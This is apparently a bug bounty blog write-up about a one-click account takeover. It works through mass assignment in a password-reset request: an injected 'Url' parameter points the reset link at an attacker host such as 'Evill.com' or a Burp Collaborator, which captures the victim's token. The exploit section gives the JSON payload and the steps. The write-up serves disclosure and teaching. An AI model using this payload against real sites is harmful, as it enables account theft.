Jan 1, 2022
One Click To Account Takeover
Hello amazing hunters.
Today , I want to tell a story about my favorite endpoint , Again.
I noticed in the last story , How i able to takeover user’s account with zero click.
Today , I want to try another way to takeover account but this time we need one click from user. 😉
OVERVIEW :
In target.com when we ask reset password , We will receive an email with a reset password link.
- Target.com/RestPassword/Token/blablablabla
This time , I focus on steal user’s token.
In first try , I inject some header like :
- “X-Forwarded-Host:”
- “X-Forwarded-For:”
Unfortunately , Site was not vulnerable to host header injection.
In second try , I noticed a cool thing which lead me to change Host of reset password link but it was not clearly.
Golden Tip :
I want to tell you a golden tip in this scenario , Should notice to mass assignment vulnerability. If i capture the reset password request , In body request i have a parameter in content-type of json:
- {“email” : “Evil@attacker.com”}
I said to myself , Is it possible some hidden parameters in request ?
Normally if user send a request with null value , The parameter filled with default value.
Unfortunately , I couldn’t use param miner because the endpoint has rate limit and after each test parameter , I had to check the email. I had to test my word list manually :)
After short time i found a simple parameter that lead me change all the Host and path of reset password link.
When i sent my request with these parameters :
- {“email” : “Evil@attacker.com” , “Url” : “https://Evill.com/Angel/”}
I got :
Yes, We did it. 😎🥂
EXPLOIT
To exploit this vulnerability , We have to enter victim email and capture the request after add “Url” parameter with my burp collaborators as value , Then forward the request. One click from user need till account takeover.
After user click on link , We will receive his/her token in burp collaborator then enter the token , ….. 😉
I hope this write-up was helpful for you, Have a good day.
